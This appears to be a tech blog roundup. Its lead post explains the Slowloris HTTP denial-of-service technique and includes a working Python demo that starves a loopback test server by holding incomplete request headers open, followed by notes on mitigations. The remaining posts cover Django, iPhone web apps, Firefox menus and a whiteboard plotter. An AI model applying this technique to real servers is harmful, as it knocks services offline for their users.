Slowloris HTTP denial of service

[RSnake] has developed a denial of service technique that takes down web servers far more cheaply than the usual approach. Traditionally, a denial of service attack meant sending a server thousands of requests that needlessly tie up resources until it fails; those requests have to arrive in quick succession, so it is usually a distributed effort. [RSnake]'s technique instead has a single client open many HTTP connections and hold each one open for as long as possible, trickling out request headers a line at a time and never sending the blank line that completes the request. Most servers accept only a set number of simultaneous connections, so once the slow connections fill that pool, legitimate requests are never serviced and the site is effectively down. Servers that dedicate a worker thread or process to each connection, such as Apache, are affected; event-driven servers that can park thousands of idle connections cheaply are largely not.

A useful side effect of the technique is that the machine itself does not crash; only the HTTP service is affected, and the site comes back online the moment the attack stops. His example Perl implementation, slowloris, can take down an average website from a single computer.

Update: Reader [Motoma] sent in a Python implementation of slowloris called PyLoris.
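To make the mechanics concrete, here is an added lab demonstration (not [RSnake]'s slowloris, nor [Motoma]'s PyLoris) that runs entirely against a loopback test server. A single-threaded Python HTTP server stands in for a server with a small worker pool; one connection that sends an incomplete header block, then an occasional harmless extra header, is enough to starve a legitimate request, and service returns as soon as that connection is closed. The host, port, header names and timings are constructed for the demo.

```python
"""Slowloris mechanics against a loopback test server (lab demo only)."""
import http.server
import random
import socket
import threading
import time
import urllib.error
import urllib.request

HOST = "127.0.0.1"  # loopback only: this is a demonstration, not a tool


def partial_request(host: str, path: str = "/") -> bytes:
    """Opening of a GET request that deliberately omits the blank line
    ending the header block, so the server keeps waiting for more headers."""
    return (
        f"GET {path}?{random.randint(0, 9999)} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "User-Agent: slowloris-demo\r\n"  # constructed UA for the demo
        "Accept: */*\r\n"
    ).encode("ascii")


def keepalive_header() -> bytes:
    """One harmless header line; sending one every few seconds keeps the
    connection alive without ever completing the request."""
    return f"X-a: {random.randint(1, 5000)}\r\n".encode("ascii")


def is_complete(request: bytes) -> bool:
    """True only once the header block has been terminated by CRLF CRLF."""
    return b"\r\n\r\n" in request


def open_slow_connection(host: str, port: int) -> socket.socket:
    """Connect and send only the incomplete header block."""
    sock = socket.create_connection((host, port), timeout=5)
    sock.sendall(partial_request(host))
    return sock


class OkHandler(http.server.BaseHTTPRequestHandler):
    """Tiny victim: HTTPServer handles one connection at a time, standing
    in for a server whose worker pool is exhausted by held connections."""

    def do_GET(self):
        body = b"ok"
        try:
            self.send_response(200)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
        except OSError:
            pass  # client already gave up; nothing to do

    def log_message(self, *args):
        pass  # keep the demo output quiet


def probe(port: int, timeout: float = 1.0) -> str:
    """Legitimate client: body on success, 'TIMEOUT' if the server never answers."""
    try:
        with urllib.request.urlopen(f"http://{HOST}:{port}/", timeout=timeout) as r:
            return r.read().decode()
    except (TimeoutError, socket.timeout, urllib.error.URLError):
        return "TIMEOUT"


def demo() -> list:
    """Healthy -> starved while one slow connection is held -> healthy again."""
    server = http.server.HTTPServer((HOST, 0), OkHandler)
    port = server.server_address[1]
    threading.Thread(target=server.serve_forever, daemon=True).start()
    results = [probe(port)]                  # server is healthy: "ok"
    slow = open_slow_connection(HOST, port)  # occupy the only worker
    time.sleep(0.2)
    results.append(probe(port))              # legitimate request starves
    slow.sendall(keepalive_header())         # request still never finishes
    results.append(probe(port))              # still starved
    slow.close()                             # attack stops...
    time.sleep(0.2)
    results.append(probe(port, timeout=3.0)) # ...and service recovers at once
    server.shutdown()
    server.server_close()
    return results


if __name__ == "__main__":
    print(demo())
```

Note that nothing in the held connection is malformed: every byte is a valid start of an HTTP request, which is why header-completion timeouts and per-client connection limits, rather than request filtering, are the mitigations that work.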

[photo: cutebreak]

Why I Hate Django

[Cal Henderson] delivered a keynote titled Why I Hate Django at the first annual DjangoCon. Django is an open source, BSD licensed web framework written in Python. Google has posted the keynote in its entirety to YouTube. While the talk is humorous (and takes many jabs at Rails developers), it does provide insight into what makes a good web framework. [Cal] is Director of Engineering at Flickr and an authority on making websites scale. He points out that most frameworks are designed to get projects off the ground quickly but fall short once a service grows large. He covers several things in Django that need work and improvements that could be made. It's a genuinely interesting look at what it takes to go big.

Creating web applications for the iPhone

[Dominiek ter Heid] wanted to prototype an application for the iPhone that used GPS. He experimented and came up with a step-by-step tutorial on creating a web application that pushes GPS information to his iPhone using JavaScript and AJAX. The tutorial will save web hackers who want to play with the iPhone 3G a lot of grief. Using Cocoa Touch and a CSS/JavaScript pack called IUI, he created a web application that looks native on the iPhone and can grab GPS information. The application integrates the Google Maps API with the GeoNames database. We look forward to seeing the creative applications this prototype inspires. What sort of web application would you want to create for the iPhone?

[via digg]

Hacking Firefox menus

[Nick] sent in his quick hack for getting rid of extra menu options in Firefox 3, like the ever useless 'Work Offline' option. (OK, maybe modem lovers like it.) If you're tired of seeing cluttered menu choices that you never use, [Nick]'s simple trick is to edit Firefox's XML-formatted XUL files to clean things up. There's some risk involved, but nothing a quick reinstall can't repair. The writeup includes a basic introduction to the XML tags, so you can probably manage it. You can use a text editor, right? (Just don't forget to have the installer or a backup copy handy before you start playing around.)

Remote control whiteboard


Whenever [sprite_tm] sends in his latest project, it’s like getting a Christmas present and a night off. He put together a whiteboard, x/y stepper system, serial interfaced microcontroller and added a webcam with perspective correction for the online view. Me? I’m tempted to build one of these for leaving notes for the wife when I’m out.
